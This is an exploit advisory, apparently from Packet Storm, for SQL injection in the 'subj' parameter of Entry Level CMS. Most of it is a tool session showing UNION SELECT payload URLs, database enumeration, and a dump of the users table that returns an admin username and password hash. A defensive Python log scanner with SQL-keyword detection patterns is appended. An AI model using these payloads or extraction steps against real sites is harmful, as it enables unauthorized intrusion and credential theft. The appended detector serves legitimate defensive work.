Entry Level CMS SQL Injection

2010-02-23T00:00:00
ID PACKETSTORM:86559
Type packetstorm
Reporter HaMaDa SCoOoRPioN
Modified 2010-02-23T00:00:00

Description

                                        
                                            `  
  
  
[+]Title : SQL Injection Entry Level Content Management System (EL CMS) with schemafuzz.py  
  
--==[ Author ]==--  
[+] Author : [+] HaMaDa SCoOoRPioN (NEWBIE)  
[+] Contact : 0u@linuxmail.org  
[+] Group : The ISLAM OF DEFENDERS AND ATTACK  
[+] Site : www.islam-defenders.com  
********************************************  
  
[Software Information ]  
[+]Software : Entry Level Content Management System (EL CMS)  
[+]Vendor : http://www.entrylevelcms.com/  
[+]Vulnerability : SQL Injection  
********************************************  
  
[ Vulnerable File ]  
http://localhost/website/index.php?subj=4  
  
[demo with schemafuzz.py]  
|---------------------------------------------------------------  
| 0u[at]linuxmail[dot]org v5.0  
| 6/2008 schemafuzz.py  
| -MySQL v5+ Information_schema Database Enumeration  
| -MySQL v4+ Data Extractor  
| -MySQL v4+ Table & Column Fuzzer  
| Usage: schemafuzz.py [options]  
| -h help darkc0de.com  
|------------------------------------------------------------  
  
C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6" --findcol  
  
  
[+] URL:http://localhost/website/index.php?subj=6--  
[+] Evasion Used: "+" "--"  
[+] 03:36:40  
[-] Proxy Not Given  
[+] Attempting To find the number of columns...  
[+] Testing: 0,1,2,3,  
[+] Column Length is: 4  
[+] Found null column at column #: 0  
[+] SQLi URL:  
http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3--  
[+] darkc0de URL:  
http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3  
[-] Done!  
  
C:\Python26\exploit\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=6+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --full  
  
|------------------------------------------------------------  
|  
| 6/2008 schemafuzz.py  
| -MySQL v5+ Information_schema Database Enumeration  
| -MySQL v4+ Data Extractor  
| -MySQL v4+ Table & Column Fuzzer  
| Usage: schemafuzz.py [options]  
| -h help darkc0de.com  
|------------------------------------------------------------  
  
[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--  
[+] Evasion Used: "+" "--"  
[+] 05:33:34  
[+] Proxy Not Given  
[+] Gathering MySQL Server Configuration...  
Database: vman  
User: root@localhost  
Version: 5.0.51a  
  
[Database]: elcms_db  
[Table: Columns]  
[0]pages: id,subject_id,menu_name,position,visible,content  
[1]subjects: id,menu_name,position,visible  
[2]users: id,username,hashed_password  
  
[-] [05:55:27]  
[-] Total URL Requests 17  
[-] Done  
  
  
C:\Python26\schemafuzz>schemafuzz.py -u "http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3" --dump -D elcms_db -T users -C id,username,hashed_password  
  
|------------------------------------------------------------  
|  
| 6/2008 schemafuzz.py  
| -MySQL v5+ Information_schema Database Enumeration  
| -MySQL v4+ Data Extractor  
| -MySQL v4+ Table & Column Fuzzer  
| Usage: schemafuzz.py [options]  
| -h help darkc0de.com  
|------------------------------------------------------------  
  
[+] URL:http://localhost/website/index.php?subj=4+AND+1=2+UNION+SELECT+darkc0de,1,2,3--  
[+] Evasion Used: "+" "--"  
[+] 05:35:14  
[+] Proxy Not Given  
[+] Gathering MySQL Server Configuration...  
Database: vman  
User: root@localhost  
Version: 5.0.51a  
[+] Dumping data from database "vman" Table "users"  
[+] Column(s) ['id', 'username', 'hashed_password']  
[+] Number of Rows: 1  
  
[0]  
9:admin:376cb350808d766e547eadc45b8f19f541d436c8:376cb350808d766e547eadc45b  
8f19f541d436c8:  
  
[-] [05:35:15]  
[-] Total URL Requests 3  
[-] Done  
  
If you do not understand the steps above, see the tool's help:  
[Option/help for this tool]  
schemafuzz.py -h  
  
********************************************  
-- Thank YOU BRO  
  
HaMaDa SCoOoRPioN  
  
www.islam-defenders.com  
  
0u@linuxmail.org  
  
  
  
  
`
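
For defenders, an added example (not part of the original advisory and not schemafuzz.py code): a log check that flags requests where the `subj` parameter is not a plain integer, which is what every request in the session above looks like once URL-decoded. The log lines, IP addresses and the helper names `inspect_line` and `scan` are constructed for illustration, and a combined-log-style access log is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined-log style); addresses are documentation IPs.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Feb/2010:03:30:01 +0000] "GET /website/index.php?subj=4 HTTP/1.1" 200 5120
192.0.2.77 - - [23/Feb/2010:03:36:40 +0000] "GET /website/index.php?subj=6+AND+1=2+UNION+SELECT+0,1,2,3-- HTTP/1.1" 200 4870
192.0.2.77 - - [23/Feb/2010:03:36:41 +0000] "GET /website/index.php?subj=6%20and%201=2%20union%20select%200,1,2,3 HTTP/1.1" 200 4870
192.0.2.31 - - [23/Feb/2010:03:41:09 +0000] "GET /website/index.php?subj=abc HTTP/1.1" 200 1200
192.0.2.10 - - [23/Feb/2010:03:42:12 +0000] "GET /website/style.css HTTP/1.1" 200 3301
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
INT_RE = re.compile(r"[0-9]{1,10}")  # what a numeric id parameter should look like
SQL_RE = re.compile(r"\b(union|select|information_schema|concat)\b|--|/\*|#", re.I)


def inspect_line(line, param="subj"):
    """Return a finding dict if `param` is present and not a plain integer, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, when, target, status = m.groups()
    # parse_qs URL-decodes, so "+" and "%20" both become spaces before matching.
    for value in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
        if not INT_RE.fullmatch(value):
            return {"client": client, "time": when, "status": int(status),
                    "value": value, "sql_like": bool(SQL_RE.search(value))}
    return None


def scan(log_text, param="subj"):
    """Inspect every line and return the findings in log order."""
    findings = (inspect_line(line, param) for line in log_text.splitlines())
    return [f for f in findings if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        label = "SQLi pattern" if f["sql_like"] else "non-integer value"
        print(f'{f["time"]} {f["client"]} {label}: {f["value"]!r}')
```

The same integer-only rule, enforced in the application before the value reaches the query and combined with a parameterized statement, is the fix for this class of bug; the log check only tells you whether someone has already been probing.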